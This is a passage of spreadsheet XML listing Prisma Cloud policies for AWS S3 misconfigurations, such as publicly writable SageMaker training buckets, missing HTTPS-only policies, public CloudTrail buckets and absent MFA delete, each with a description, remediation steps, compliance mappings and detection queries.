      <c r="AC2091" t="inlineStr">
        <is>
          <t>PC-AWS-S3-29</t>
        </is>
      </c>
      <c r="AD2091" t="b">
        <v>1</v>
      </c>
      <c r="AE2091" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2091" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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1" t="inlineStr">
        <is>
          <t>630d3779-d932-4fbf-9cce-6e8d793c6916</t>
        </is>
      </c>
      <c r="AI2091" t="inlineStr">
        <is>
          <t>67dc23e7-e6db-4efb-b7e8-b4bd7778c891</t>
        </is>
      </c>
      <c r="AJ2091" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2091" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2092">
      <c r="A2092" t="inlineStr"/>
      <c r="B2092" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2092" s="2" t="inlineStr"/>
      <c r="D2092" t="inlineStr"/>
      <c r="E2092" t="inlineStr"/>
      <c r="F2092" t="inlineStr"/>
      <c r="G2092" t="b">
        <v>1</v>
      </c>
      <c r="H20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92" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2092" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2092" t="inlineStr">
        <is>
          <t>AI data poisoning risk due to publicly writable S3 Bucket used for SageMaker training job data</t>
        </is>
      </c>
      <c r="L2092" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2092" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2092" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2092" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2092" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2092" t="inlineStr"/>
      <c r="R2092" t="inlineStr"/>
      <c r="S2092" t="inlineStr"/>
      <c r="T2092" t="b">
        <v>0</v>
      </c>
      <c r="U2092" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2092" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2092" t="inlineStr">
        <is>
          <t>This policy identifies the potential risk of AI data poisoning due to publicly writable AWS S3 buckets used for storing AWS SageMaker training job data input.
S3 buckets store the datasets required for training machine learning models in SageMaker. When these buckets have public write permissions, it increases the risk of unauthorized access, data breaches, and potential tampering with the training data, leading to AI data poisoning.
Immediate action is required to enforce stricter access controls and eliminate public write permissions for the reported S3 buckets used for storing SageMaker training job data input. This will help protect the integrity and security of your AI models.</t>
        </is>
      </c>
      <c r="X2092"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PUT/CREATE/REPLICATE/DELETE objects in your S3 bucket. You may also want to specifically limit the 'Principal' ability to perform specific PUT/CREATE/REPLICATE/DELETE functions, without the wild card.
If 'Bucket Policy' is not required delete the existing 'Bucket Policy'.
b. Click on Save changes
Note: Make sure updating 'Access Control List' or 'Bucket Policy' does not affect S3 bucket data access.</t>
        </is>
      </c>
      <c r="Y2092" t="inlineStr"/>
      <c r="Z2092" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-s3api-get-bucket-acl') and finding.name contains all ('AWS S3 bucket is utilized for AWS Sagemaker training job data','AWS S3 bucket publicly writable')</t>
        </is>
      </c>
      <c r="AA2092" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2092" t="inlineStr">
        <is>
          <t>2024-07-08 06:43:43</t>
        </is>
      </c>
      <c r="AC2092" t="inlineStr"/>
      <c r="AD2092" t="b">
        <v>1</v>
      </c>
      <c r="AE2092" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2092" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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92" t="inlineStr">
        <is>
          <t>f2ffec54-723e-42d0-8cc0-ffeda875ad88</t>
        </is>
      </c>
      <c r="AI2092" t="inlineStr">
        <is>
          <t>9c0d86a9-9884-4a0b-a3b0-8d82497826a2</t>
        </is>
      </c>
      <c r="AJ2092" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2092" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2093">
      <c r="A2093" t="inlineStr"/>
      <c r="B2093" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2093" s="2" t="inlineStr"/>
      <c r="D2093" t="inlineStr"/>
      <c r="E2093" t="inlineStr"/>
      <c r="F2093" t="inlineStr"/>
      <c r="G2093" t="b">
        <v>1</v>
      </c>
      <c r="H20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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2093" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2093" t="inlineStr">
        <is>
          <t>Data exposure risk due to AWS S3 bucket containing sensitive information and not configured with secure data transport policy</t>
        </is>
      </c>
      <c r="L2093" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,DISCOVERY</t>
        </is>
      </c>
      <c r="M2093" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2093" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2093" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2093" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2093" t="inlineStr"/>
      <c r="R2093" t="inlineStr"/>
      <c r="S2093" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2093" t="b">
        <v>0</v>
      </c>
      <c r="U2093" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2093" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2093" t="inlineStr">
        <is>
          <t>This policy identifies potential data exposure risk due to AWS S3 buckets containing sensitive information and not configured with secure data transport policy.
The combination of sensitive data in the storage asset and not configured with secure transfer increases the risk of unauthorized access and data exposure. When secure data transport policy is set, REST APIs to access your S3 bucket connect using HTTPs any requests using HTTP will be rejected.
Immediate attention is required to configure secure transfer feature reported for the S3 bucket as soon as possible and enforce stricter access methods for reported S3 bucket as it contains sensitive information.</t>
        </is>
      </c>
      <c r="X2093" t="inlineStr">
        <is>
          <t>[MISCONFIGURATION]
1. Sign into the AWS console
2. Navigate to Amazon S3 Dashboard
3. Click on 'Buckets' (Left Panel)
4. Choose the reported S3 bucket
5. On 'Permissions' tab, Click on 'Bucket Policy'
6. Add a bucket policy that explicitly denies (Effect: Deny) all access (Action: s3:) from anybody who browses (Principal: ) to Amazon S3 objects within an Amazon S3 bucket if they are not accessed through HTTPS (aws:SecureTransport: false). Below is the sample policy:
{
 'Sid': 'ForceSSLOnlyAccess',
 'Effect': 'Deny',
 'Principal': '*',
 'Action': 's3:GetObject',
 'Resource': 'arn:aws:s3:::bucket_name/*',
 'Condition': {
   'Bool': {
   'aws:SecureTransport': 'false'
  }
 }
}
[DATA_EXPOSURE]
1. Make sure the resource is not exposed to public.
2. Delete or move the sensitive data if it is mistakenly place</t>
        </is>
      </c>
      <c r="Y2093" t="inlineStr"/>
      <c r="Z2093" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-s3api-get-bucket-acl') and finding.name contains all ('AWS S3 bucket not configured with secure data transport policy','Storage Asset with sensitive data found')</t>
        </is>
      </c>
      <c r="AA2093" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2093" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:06</t>
        </is>
      </c>
      <c r="AC2093" t="inlineStr"/>
      <c r="AD2093" t="b">
        <v>1</v>
      </c>
      <c r="AE2093" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2093" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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3" t="inlineStr">
        <is>
          <t>2e1dd7c7-cf73-427d-9d3b-e7f8e329eb58</t>
        </is>
      </c>
      <c r="AI2093" t="inlineStr">
        <is>
          <t>fef481a5-b811-49cb-a55b-358f7d93ed60</t>
        </is>
      </c>
      <c r="AJ2093" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2093" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2094">
      <c r="A2094" t="inlineStr">
        <is>
          <t>ISO 27001:2013, CSA CCM v3.0.1, HITRUST CSF v9.3 [Deprecated], kfirdaus AWS Account-CS, MITRE ATT&amp;CK v10.0 [Deprecated], ISO/IEC 27001:2022, GDPR, APRA (CPS 234) Information Security, CSA CCM v3.0.1, Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST 800-53 Rev 5, HIPAA, NIST CSF, NIST CSF v2.0, NIST CSF, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, ISO 27002:2022, NIST 800-53 Rev 5, wells fargo CIS v1.5.0 (AWS) - Level 1, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, NIST 800-171 Rev1, HITRUST CSF v9.3 [Deprecated], Copy of ACSC Information Security Manual (ISM)-clone, HITRUST CSF v9.3 [Deprecated], HITRUST v.9.4.2 [Deprecated], GDPR, Matt's ATT&amp;ACK, jbrox - GDPR, TX-RAMP Level 2, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v8.2 [Deprecated], ACSC Information Security Manual (ISM), NYDFS 23 CRR-NY 500.0, ISO/IEC 27001:2022, ISO 27002:2022, CIS v1.5.0 (AWS) - Level 1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), HITRUST CSF v9.3 [Deprecated], Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), HITRUST CSF v9.3 [Deprecated], MITRE ATT&amp;CK v12, Copy of ACSC Information Security Manual (ISM)-clone, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST CSF v.11.2.0, kashan ACSC Information Security Manual (ISM), ITSG-33, ISO 27001:2013, TX-RAMP Level 2, ISO 27001:2013, kfirdaus AWS Account-CS, SOC 2, ITSG-33, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, CDC NIST 800-53 Rev4, NIST 800-53 Rev4, NIST 800-53 Rev 5, CyberSecurity Law of the People's Republic of China, Insurance Regulatory And Development Authority Of India, Telecommunications Security Act - TSA, SOC 2, TX-RAMP Level 1, NIST SP 800-171 Revision 3, Brazilian Data Protection Law (LGPD), PCI DSS v4.0, NIST CSF, Copy of ACSC Information Security Manual (ISM)-clone, NIST SP 800-171 Revision 3, ITSG-33, MITRE ATT&amp;CK v6.3 [Deprecated], MLPS 2.0 (Level 2), Risk Management in Technology (RMiT), CIS Controls v8, ISO 27001:2013, NIST 800-171 Rev1, CyberSecurity Law of the People's Republic of China, CIS v2.0.0 (AWS) - Level 1, SOC 2, kfirdaus AWS Account-CS, MLPS 2.0 (Level 3), SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST CSF, jbrox - GDPR, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, SOC 2, ISO/IEC 27001:2022, NIST 800-53 Rev4, Cybersecurity Maturity Model Certification (CMMC) v.1.02, HITRUST CSF v9.3 [Deprecated], Secure Controls Framework (SCF) - 2024.2, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Sarbanes Oxley Act (SOX), ISO 27001:2013, APRA (CPS 234) Information Security, CIS v1.4.0 (AWS), kashan ACSC Information Security Manual (ISM), CDC NIST 800-53 Rev4, CIS Controls v7.1, CyberSecurity Law of the People's Republic of China, Secure Controls Framework (SCF) - 2022.2.1, ITSG-33, MLPS 2.0, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Australian Energy Sector Cyber Security Framework (AESCSF), CHC HITRUST CSF v.9.6.0, NIST CSF, HITRUST v.9.4.2 [Deprecated], PIPEDA, CIS v1.3.0 (AWS), ISO 27002:2022, Copy of CIS Controls v8, NIST SP 800-172, SOC 2, PCI DSS v3.2.1, HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, kashan ACSC Information Security Manual (ISM), CSA CCM v3.0.1, NYDFS 23 CRR-NY 500.0, MTSBv2_AWS, MAS TRM 2021, CCPA 2018, ACSC Information Security Manual (ISM), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ACSC Information Security Manual (ISM), NIST 800-171 Rev1, CIS v1.2.0 (AWS), NIST CSF, Telecommunications Security Act - TSA, TX-RAMP Level 2, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), ACSC Information Security Manual (ISM), CHC HITRUST CSF v.9.6.0, kfirdaus AWS Account-CS, NIST 800-53 Rev 5, CSA CCM v3.0.1, HIPAA, HIPAA, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, NIST 800-171 Rev1, HITRUST CSF v.9.6.0, PCI DSS v3.2.1, NIST SP 800-171 Revision 2</t>
        </is>
      </c>
      <c r="B2094" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2094" s="2" t="inlineStr"/>
      <c r="D2094" t="inlineStr"/>
      <c r="E2094" t="inlineStr"/>
      <c r="F2094" t="inlineStr"/>
      <c r="G2094" t="b">
        <v>0</v>
      </c>
      <c r="H20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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2094" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2094" t="inlineStr">
        <is>
          <t>AWS CloudTrail bucket is publicly accessible</t>
        </is>
      </c>
      <c r="L2094" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2094" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2094" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2094" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2094" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2094" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2094" t="inlineStr">
        <is>
          <t>ISM-0854</t>
        </is>
      </c>
      <c r="S2094" t="inlineStr">
        <is>
          <t>CIS</t>
        </is>
      </c>
      <c r="T2094" t="b">
        <v>0</v>
      </c>
      <c r="U2094" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2094" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2094" t="inlineStr">
        <is>
          <t>This policy identifies publicly accessible S3 buckets that store CloudTrail data. These buckets contains sensitive audit data and only authorized users and applications should have access.</t>
        </is>
      </c>
      <c r="X2094" t="inlineStr">
        <is>
          <t>1. Login to the AWS Console
2. Navigate to the 'S3' service
3. Click on the 'S3' resource reported in the alert
4. Click on the 'Permissions'
5. If Access Control List' is set to 'Public' follow below steps
a. Under 'Access Control List', Click on 'Everyone' and uncheck all items
b. Click on Save
6. If 'Bucket Policy' is set to public follow below steps
a. Under 'Bucket Policy', modify the policy to remove public access
b. Click on Save
c. If 'Bucket Policy' is not required delete the existing 'Bucket Policy'.
Note: Make sure updating 'Access Control List' or 'Bucket Policy' does not affect S3 bucket data access.</t>
        </is>
      </c>
      <c r="Y2094" t="inlineStr"/>
      <c r="Z2094" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name='aws-s3api-get-bucket-acl' AND json.rule = "((((acl.grants[?(@.grantee=='AllUsers')] size &gt; 0) or policyStatus.isPublic is true) and publicAccessBlockConfiguration does not exist and accountLevelPublicAccessBlockConfiguration does not exist) or ((acl.grants[?(@.grantee=='AllUsers')] size &gt; 0) and ((publicAccessBlockConfiguration.ignorePublicAcls is false and accountLevelPublicAccessBlockConfiguration does not exist) or (publicAccessBlockConfiguration does not exist and accountLevelPublicAccessBlockConfiguration.ignorePublicAcls is false) or (publicAccessBlockConfiguration.ignorePublicAcls is false and accountLevelPublicAccessBlockConfiguration.ignorePublicAcls is false))) or (policyStatus.isPublic is true and ((publicAccessBlockConfiguration.restrictPublicBuckets is false and accountLevelPublicAccessBlockConfiguration does not exist) or (publicAccessBlockConfiguration does not exist and accountLevelPublicAccessBlockConfiguration.restrictPublicBuckets is false) or (publicAccessBlockConfiguration.restrictPublicBuckets is false and accountLevelPublicAccessBlockConfiguration.restrictPublicBuckets is false))))" as X; config from cloud.resource where api.name = 'aws-cloudtrail-describe-trails' as Y; filter'$.X.bucketName equals $.Y.s3BucketName'; show X;</t>
        </is>
      </c>
      <c r="AA2094" t="inlineStr">
        <is>
          <t>Ivaylo Kirilov</t>
        </is>
      </c>
      <c r="AB2094" t="inlineStr">
        <is>
          <t>2024-11-14 16:41:34</t>
        </is>
      </c>
      <c r="AC2094" t="inlineStr">
        <is>
          <t>PC-AWS-S3-1</t>
        </is>
      </c>
      <c r="AD2094" t="b">
        <v>1</v>
      </c>
      <c r="AE2094" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2094" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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4" t="inlineStr">
        <is>
          <t>b76ad441-e715-4fd0-bbc3-cd3b2bee34bf</t>
        </is>
      </c>
      <c r="AI2094" t="inlineStr">
        <is>
          <t>f940021d-42bc-4f29-b9f9-0ae819318ba9</t>
        </is>
      </c>
      <c r="AJ2094" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2094" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2095">
      <c r="A2095" t="inlineStr"/>
      <c r="B2095" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2095" s="2" t="inlineStr"/>
      <c r="D2095" t="inlineStr"/>
      <c r="E2095" t="inlineStr"/>
      <c r="F2095" t="inlineStr"/>
      <c r="G2095" t="b">
        <v>1</v>
      </c>
      <c r="H20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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2095" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2095" t="inlineStr">
        <is>
          <t>Sensitive data exposure risk due to overly permissive AWS S3 bucket using an encryption key configured with wide unrestricted access policies</t>
        </is>
      </c>
      <c r="L2095" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,PRIVILEGE_ESCALATION,DISCOVERY</t>
        </is>
      </c>
      <c r="M2095" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2095" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2095" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2095" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2095" t="inlineStr"/>
      <c r="R2095" t="inlineStr"/>
      <c r="S2095" t="inlineStr"/>
      <c r="T2095" t="b">
        <v>0</v>
      </c>
      <c r="U2095" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2095" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2095" t="inlineStr">
        <is>
          <t>This policy identifies the potential risk of a data breach due to AWS S3 buckets containing sensitive information being encrypted with an encryption key configured with wide/unrestricted access policies.
The combination of wide access permissions, the presence of sensitive data in the S3 bucket, and any entity having access to an encryption key allows them to decrypt the data encrypted by it, making the data more easily accessible and increases the risk of unauthorized access and data exfiltration.
Immediate attention is required to review the S3 bucket and its encryption keys should have a proper access policy to restrict only required operations based on business requirements instead of having wide/unrestricted access.</t>
        </is>
      </c>
      <c r="X2095" t="inlineStr">
        <is>
          <t>[MISCONFIGURATION]
The following steps are recommended to enable the automatic rotation of the KMS key used by the S3 bucket
1. Log in to the AWS Console and navigate to the 'S3' service.
2. Click on the S3 bucket reported in the alert.
3. Click on the 'Properties' tab.
4. Under the 'Default encryption' section, click on the KMS key link in 'Encryption key ARN'.
5. Click on the 'Key policy' tab on the navigated KMS key window.
6. Click on 'Edit',
7. Replace the 'Everyone' grantee (i.e. '*') from the Principal element value with an AWS account ID or an AWS account ARN.
 OR
Add a Condition clause to the existing policy statement so that the KMS key is restricted.
8. Click on 'Save Changes'
[MISCONFIGURATION]
1. Log in to the AWS console
2. Navigate to the S3 dashboard
3. Choose the reported S3 bucket
4. In the 'Permissions' tab, click on the 'Bucket Policy'
5. Update the S3 bucket policy, by removing Principal conatining wildcard(*) to specific accounts, Services or IAM entities. Also restrict S3 action operations to specific instead of using wildcard (*).
6. In the 'Permissions' tab, click on the 'Block public access' and enable 'Block public and cross-account access to buckets and objects through any public bucket or access point policies'
[DATA_EXPOSURE]
1. Make sure the resource is not exposed to public.
2. Delete or move the sensitive data if it is mistakenly place</t>
        </is>
      </c>
      <c r="Y2095" t="inlineStr"/>
      <c r="Z2095" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-s3api-get-bucket-acl') and finding.name contains all ('Storage Asset with sensitive data found','AWS S3 bucket encrypted using Customer Managed Key (CMK) with overly permissive policy','AWS S3 bucket policy overly permissive to any principal')</t>
        </is>
      </c>
      <c r="AA2095" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2095" t="inlineStr">
        <is>
          <t>2024-02-02 08:15:33</t>
        </is>
      </c>
      <c r="AC2095" t="inlineStr"/>
      <c r="AD2095" t="b">
        <v>1</v>
      </c>
      <c r="AE2095" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2095" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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5" t="inlineStr">
        <is>
          <t>e72969c3-adee-40cb-8106-1b74b56f1291</t>
        </is>
      </c>
      <c r="AI2095" t="inlineStr">
        <is>
          <t>212950d1-c894-4489-97db-a69b50a001f3</t>
        </is>
      </c>
      <c r="AJ2095" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2095" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2096">
      <c r="A2096" t="inlineStr">
        <is>
          <t>SOC 2, NYDFS 23 CRR-NY 500.0, NYDFS 23 CRR-NY 500.0</t>
        </is>
      </c>
      <c r="B2096" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2096" s="2" t="inlineStr"/>
      <c r="D2096" t="inlineStr"/>
      <c r="E2096" t="inlineStr"/>
      <c r="F2096" t="inlineStr"/>
      <c r="G2096" t="b">
        <v>1</v>
      </c>
      <c r="H20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096" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2096" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2096" t="inlineStr">
        <is>
          <t>AWS S3 bucket is utilized for AWS Sagemaker training job data</t>
        </is>
      </c>
      <c r="L2096" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2096" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2096" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2096" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2096" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2096" t="inlineStr">
        <is>
          <t>500.9</t>
        </is>
      </c>
      <c r="R2096" t="inlineStr">
        <is>
          <t>500.09 (b) (2)</t>
        </is>
      </c>
      <c r="S2096" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2096" t="b">
        <v>0</v>
      </c>
      <c r="U2096" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2096" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2096" t="inlineStr">
        <is>
          <t>This policy identifies the AWS S3 bucket utilized for AWS Sagemaker training job data.
S3 buckets store the datasets required for training machine learning models in Sagemaker. Proper configuration and access control are essential to ensure the security and integrity of the training data. Improperly configured S3 buckets used for AWS Sagemaker training data can lead to unauthorized access, data breaches, and potential loss of sensitive information.
It is recommended to implement strict access controls, enable encryption, and audit permissions to secure AWS S3 buckets for AWS Sagemaker training data and ensure compliance.</t>
        </is>
      </c>
      <c r="X2096" t="inlineStr">
        <is>
          <t>To protect the S3 buckets utilized by the Sagemaker training job, please refer to the following link for recommended best practices
https://docs.aws.amazon.com/AmazonS3/latest/userguide/security-best-practices.html</t>
        </is>
      </c>
      <c r="Y2096" t="inlineStr"/>
      <c r="Z2096" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-s3api-get-bucket-acl' as X; config from cloud.resource where api.name = 'aws-sagemaker-training-job' as Y; filter '$.Y.InputDataConfig[*].DataSource.S3DataSource.bucketName intersects $.X.bucketName'; show X;</t>
        </is>
      </c>
      <c r="AA2096" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2096" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2096" t="inlineStr">
        <is>
          <t>PC-AWS-S3-1208</t>
        </is>
      </c>
      <c r="AD2096" t="b">
        <v>1</v>
      </c>
      <c r="AE2096" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2096" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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096" t="inlineStr">
        <is>
          <t>f55ba827-c722-483b-ace3-b09c69829efb</t>
        </is>
      </c>
      <c r="AI2096" t="inlineStr">
        <is>
          <t>4f900112-eb70-490e-a867-63a31769a786</t>
        </is>
      </c>
      <c r="AJ2096" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2096" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2097">
      <c r="A2097" t="inlineStr"/>
      <c r="B2097" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2097" s="2" t="inlineStr"/>
      <c r="D2097" t="inlineStr"/>
      <c r="E2097" t="inlineStr"/>
      <c r="F2097" t="inlineStr"/>
      <c r="G2097" t="b">
        <v>1</v>
      </c>
      <c r="H20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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2097" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2097" t="inlineStr">
        <is>
          <t>Data destruction risk due to sensitive data in AWS S3 bucket publicly accessible not configured with MFA delete</t>
        </is>
      </c>
      <c r="L2097" t="inlineStr">
        <is>
          <t>MFA,INTERNET_EXPOSURE,DISCOVERY</t>
        </is>
      </c>
      <c r="M2097" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2097" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2097" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2097" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2097" t="inlineStr"/>
      <c r="R2097" t="inlineStr"/>
      <c r="S2097" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2097" t="b">
        <v>0</v>
      </c>
      <c r="U2097" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2097" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2097" t="inlineStr">
        <is>
          <t>This policy identifies potential destruction risk due to AWS S3 buckets containing sensitive information is publicly accessible and not configured with MFA delete.
The combination of public write permissions, not configured with MFA delete and sensitive data storage increases the likelihood of unauthorized data access, modification, or deletion, which can lead to a data breach. Enabling Multi-Factor Authentication(MFA) Delete on a versioned bucket adds another layer of protection. In order to permanently delete an object version or suspend or reactivate versioning on the bucket valid code from the account's MFA device required.
Immediate attention is required to configure S3 MFA delete feature and enforce stricter access methods for the reported S3 bucket as it contains sensitive information.</t>
        </is>
      </c>
      <c r="X2097"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PUT/CREATE/REPLICATE/DELETE objects in your S3 bucket. You may also want to specifically limit the 'Principal' ability to perform specific PUT/CREATE/REPLICATE/DELETE functions, without the wild card.
If 'Bucket Policy' is not required delete the existing 'Bucket Policy'.
b. Click on Save changes
Note: Make sure updating 'Access Control List' or 'Bucket Policy' does not affect S3 bucket data access.
[MISCONFIGURATION]
Using console you can enable versioning on the bucket but you cannot enable MFA delete.
You can do it via only with the AWS CLI:
